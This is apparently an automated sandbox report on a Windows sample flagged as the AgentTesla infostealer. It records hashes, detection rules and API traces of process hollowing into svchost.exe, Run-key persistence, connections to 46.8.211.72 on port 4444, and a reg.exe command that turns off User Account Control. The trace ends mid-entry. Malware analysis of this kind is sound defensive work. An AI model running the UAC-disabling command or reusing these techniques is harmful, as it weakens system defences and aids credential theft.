Summary | ZeroBOX

explorer.exe

AgentTesla info stealer Generic Malware browser Google Downloader Chrome User Data Malicious Library Malicious Packer Code injection Socket Escalate priviledges Create Service KeyLogger Sniff Audio AntiDebug PE File OS Processor Check PE32 AntiVM
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 7, 2021, 8:23 a.m. Sept. 7, 2021, 8:36 a.m.
Size 440.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 754cae6c58cfb857c870d38ef49e2959
SHA256 d1ba03fd533eb3834a4448172fc9f792ed54096f2718a84eebf719cb22d2fa1e
CRC32 62C55D72
ssdeep 12288:9Ye6UWhaT5xnDdLv9rX+1jZJqxE/ZjEcyib:v6UWUT5xDN9IjZJsCZDyg
Yara
  • PE_Header_Zero - PE File Signature
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • Malicious_Packer_Zero - Malicious Packer

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
107.180.56.180 Active Moloch
46.8.211.72 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .gfids
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1744
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0
description explorer.exe tried to sleep 235 seconds, actually delayed analysis time by 235 seconds
file C:\Users\test22\AppData\Local\Temp\install.vbs
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\explorer\explorer.exe"
cmdline C:\Windows\SysWOW64\svchost.exe
file C:\Users\test22\AppData\Local\Temp\install.vbs
file C:\Users\test22\AppData\Local\Temp\explorer.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2096
thread_handle: 0x000000c4
process_identifier: 2100
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000c0
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\install.vbs
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\install.vbs
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c "C:\Windows\SysWOW64\explorer\explorer.exe"
filepath: cmd
1 1 0

CreateProcessInternalW

thread_identifier: 2428
thread_handle: 0x000000c4
process_identifier: 2168
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000c0
1 1 0
section {u'size_of_data': u'0x00000600', u'virtual_address': u'0x00070000', u'entropy': 7.749530141861938, u'name': u'.rsrc', u'virtual_size': u'0x000005fe'} entropy 7.74953014186 description A section with a high entropy has been found
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Google Chrome User Data Check rule Chrome_User_Data_Check_Zero
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Win.Trojan.agentTesla rule Win_Trojan_agentTesla_Zero
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description browser info stealer rule infoStealer_browser_Zero
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2332
process_handle: 0x000000d0
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2332
process_handle: 0x000000d0
1 0 0
cmdline C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmdline /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
host 107.180.56.180
host 46.8.211.72
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2212
region_size: 479232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001bc
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\explorer reg_value "C:\Windows\SysWOW64\explorer\explorer.exe"
Time & API Arguments Status Return Repeated

connect

ip_address: 46.8.211.72
socket: 280
port: 4444
4294967295 0

connect

ip_address: 46.8.211.72
socket: 464
port: 4444
4294967295 0

connect

ip_address: 46.8.211.72
socket: 300
port: 4444
4294967295 0

connect

ip_address: 46.8.211.72
socket: 480
port: 4444
4294967295 0

connect

ip_address: 46.8.211.72
socket: 484
port: 4444
4294967295 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªƒB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,c皨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,c皿cûâ,cîâ-cñã,cy¼%b±â,c|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà Äl÷0@Pǚ€‡Üþˆ80l8Älhl@0t.text¶ `.rdataˆo0p@@.data\= Ž@À.tls àœ@À.gfids0ðž@@.rsrcþ¢@@.relocˆ8:¨@B
base_address: 0x00400000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer: €ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ “    ´tE¸wE²tE..€¡FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶F„¡FP¶FP¶FP¶FP¶FP¶FP¶FP¶Fˆ¡Fÿÿÿÿ¸wE¨¢F¨¢F¨¢F¨¢F¨¢Fˆ¡F8zE¸{EŠEè¡F€§FCPSTPDT°¢Fð¢Fÿÿÿÿÿÿÿÿÿÿÿÿ€ ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ€§Fþÿÿÿþÿÿÿu˜0Ï!­tåša¾Œe¸‘¢z»Œ^ž âȨ3œ46E.?AVtype_info@@46E.?AVbad_alloc@std@@46E.?AVbad_array_new_length@std@@46E.?AVlogic_error@std@@46E.?AVlength_error@std@@46E.?AVout_of_range@std@@46E.?AV_Facet_base@std@@46E.?AV_Locimp@locale@std@@46E.?AVfacet@locale@std@@46E.?AU_Crt_new_delete@std@@46E.?AVcodecvt_base@std@@46E.?AUctype_base@std@@46E.?AV?$ctype@D@std@@46E.?AV?$codecvt@DDU_Mbstatet@@@std@@46E.?AVbad_exception@std@@46E.H46E.?AVfailure@ios_base@std@@46E.?AVruntime_error@std@@46E.?AVsystem_error@std@@46E.?AVbad_cast@std@@46E.?AV_System_error@std@@46E.?AVexception@std@@
base_address: 0x0046a000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer: €
base_address: 0x0046e000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer: +ÔÔ„?¤Ø¾Ø„? Ù„?)s„?ÚuZ55g;Ù.~~Dñìð„?„?m(À'Æؒخ’õŒЈûõÛÝÛÝÛ(jk¡iæÞ\šF“£ã¥w¡Ô(´öä¼éÙ  b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` Ÿž†…¢†…§µ¶³´±²¯°†…¸ Ÿ†… Y
base_address: 0x0046f000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer:  €X€0€Hl’äSETTINGSÎ/G‚íþhŠ€×´(e7lìi‚FŸ7r’Y¥ð,jE}ÞeÔH±gœEÐÔ©ÅßÍYˆäÄ`ç=^ȜªbÖ­êäÀ›ô74ãÞ +5¥­im£‚–²K1‘,:ÓÞ:Ú#ÃWª v'Ìóª8vG{íb¹ÝMiF(5³ÜÓ¯l¢DU`ÊÔ2 C`›ÊÇï+{¯x9’º=ù6áԘü …\7Úá`ò_fC'|ð.±^pKV-:ˑ†ü½ž/SÛD‚6 ïv;ÄAðֈºûQçñ€Þn-3¨ý‚[…UÛ@… BìêbÚxÏ쁊þý"ªñÉü8»™ña±á&¸kûO¨üù‹rB[XxîQVŽ+ÂOK¦*˜£È÷R ù%¼+g½I¹pÑÒoº{{9XÍJŽòÖ°Ò(\†×è€4Ç$û±5§9*G•]¾v/¸“? Í&©e%$Fù𛾠Ýã º¼À,óØUg7LǸå#^3æè—ÎúŽ2yÖ1‚lj“¯r—×Iê?—T¥y÷oæH¶˜òc¸û×Ï ¬ 5•Gjó$,΍Á¸G _öÿ‡"ªÄá‹Ûƒ zåÄP¥,ø¢VBOØF\APa<EþéÑ_óéSP¢ÉrÆ£1Åo­J6ŒÔ ­ÒññtFquáù¨“bI´¶µYbLxu¬-ð,ýuá`¢ T†?ÇC{õ¸ç§í ñЊ‰ÂIµŸ„ j±Û!ÃZlV>£¾>F„ NŒ”«ÛÎ qÀï ƒúI‹Þð¼~Â2±:Ñ"£±!ïe»u+‘ ÐPU¹¾ËÙgÒDȨp+ˆeF“Ïñê±Oaƒká:çÝr¼Œ­z³¡4;À§ˆLð-=ž Ê ˆpÅèK’ž6ijˆU´½ó¦M–™Œ¨£j³.äèý#Kȕ.Õeyæ<|˜¹¾þ ææ­v6kŒ…€µQê ÜÕÑ790 MÖ>ƒ¡±L«QëŒå‚û`òw«öPÐOù›[ºàÄIQA“CþÖ[ËX)ÿÌÚl/íÚ È ©|êZlo–f0¦_È´MhÒêyY·ˆ{1kWŸÒñX(Ô.ƒX tö¨Å¬¯m.›Ð}3Gv²:a¦ÛԊ¡:áy©0#ú†mÒÈÅêßם®8Ñÿ·- ò¿ë‰©±á<††®iˆë“nÊ”%Î!|`6ö"7&UH%ä¦zm9â‰÷^RBYݚÞËüVAብ¹œ€º¢<· wHõ3.Å´ŠL|ú±¶ì!¥Òºæ‹íCƒD–o­ÙB_aËó$ȲKûѝÑ/QrWÿœ¤µÉnm&?­8’Ü2ý€µÔX|;‹Öè2æ߮į‚ÛÓÞ3÷PÆ2י¶÷_Ëß.Ñkµø™! q°¸Â+4—Zîȯò Ë "g²Aν·HNã ¸Òø\€Î±‰„|óõra Gè'ÖùHV@×åh˜Ý ö³€Œ,ù+˜ó›ò ŽéS«éŸ‰MÁºñraZF¾Y°˜[a©ZR§|†·GxJÚw«>µˆ$›­$æÚQ-¶þ¼Íh×.9gjÝ!2A{¯ WâÈ–0ËÆVÅÈ|\`(LýƓ#¹`ëÉ l¿*|f©E6ìt•¼‚«‚Å2ÎfqWàKûmoèó§°7æ$i¤Ý;섣3Jz…hf™Áù+»“ßhIL”­Ò€Â­ÍÇ£CûCcñ÷Æ $ªX[\+8yԊ˜OÈ4‘¤h%dÛ´îue¤ (ƒèŽݩ…W¡X,&…Áñq̙½v‰f<8*3ÄOŒ²·jtW~W1~ސÇßqô+ù!:
base_address: 0x00470000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2212
process_handle: 0x000001bc
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªƒB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,c皨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,c皿cûâ,cîâ-cñã,cy¼%b±â,c|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà Äl÷0@Pǚ€‡Üþˆ80l8Älhl@0t.text¶ `.rdataˆo0p@@.data\= Ž@À.tls àœ@À.gfids0ðž@@.rsrcþ¢@@.relocˆ8:¨@B
base_address: 0x00400000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0
Process injection Process 688 called NtSetContextThread to modify thread in remote process 2212
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2007957956
registers.esp: 2554328
registers.edi: 0
registers.eax: 4388716
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001c0
process_identifier: 2212
1 0 0
process: potential process injection target explorer.exe
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\explorer\explorer.exe"
parent_process wscript.exe martian_process cmd /c "C:\Windows\SysWOW64\explorer\explorer.exe"
Process injection Process 688 resumed a thread in remote process 2212
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000001c0
suspend_count: 1
process_identifier: 2212
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2440
thread_handle: 0x00000084
process_identifier: 688
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\explorer\explorer.exe
track: 1
command_line: C:\Windows\SysWOW64\explorer\explorer.exe
filepath_r: C:\Windows\SysWOW64\explorer\explorer.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
description attempts to disable user access control registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
dead_host 46.8.211.72:4444
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2096
thread_handle: 0x000000c4
process_identifier: 2100
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000c0
1 1 0

CreateProcessInternalW

thread_identifier: 3068
thread_handle: 0x000002bc
process_identifier: 1744
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\wscript.exe
track: 1
command_line: "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\install.vbs"
filepath_r: C:\Windows\System32\WScript.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002b4
1 1 0

CreateProcessInternalW

thread_identifier: 2420
thread_handle: 0x00000084
process_identifier: 1260
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\reg.exe
track: 1
command_line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
filepath_r: C:\Windows\System32\reg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2208
thread_handle: 0x00000330
process_identifier: 2816
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\explorer\explorer.exe"
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000340
1 1 0

CreateProcessInternalW

thread_identifier: 2440
thread_handle: 0x00000084
process_identifier: 688
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\explorer\explorer.exe
track: 1
command_line: C:\Windows\SysWOW64\explorer\explorer.exe
filepath_r: C:\Windows\SysWOW64\explorer\explorer.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2428
thread_handle: 0x000000c4
process_identifier: 2168
current_directory:
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000c0
1 1 0

CreateProcessInternalW

thread_identifier: 1792
thread_handle: 0x000000c8
process_identifier: 2332
current_directory:
filepath:
track: 1
command_line: c:\program files (x86)\google\chrome\application\chrome.exe
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000000d0
1 1 0

NtGetContextThread

thread_handle: 0x000000c8
3221225485 0

CreateProcessInternalW

thread_identifier: 1776
thread_handle: 0x000001c0
process_identifier: 2212
current_directory:
filepath:
track: 1
command_line: C:\Windows\SysWOW64\svchost.exe
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000001bc
1 1 0

NtGetContextThread

thread_handle: 0x000001c0
1 0 0

NtAllocateVirtualMemory

process_identifier: 2212
region_size: 479232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001bc
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªƒB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,c皨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,c皿cûâ,cîâ-cñã,cy¼%b±â,c|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà Äl÷0@Pǚ€‡Üþˆ80l8Älhl@0t.text¶ `.rdataˆo0p@@.data\= Ž@À.tls àœ@À.gfids0ðž@@.rsrcþ¢@@.relocˆ8:¨@B
base_address: 0x00400000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00453000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

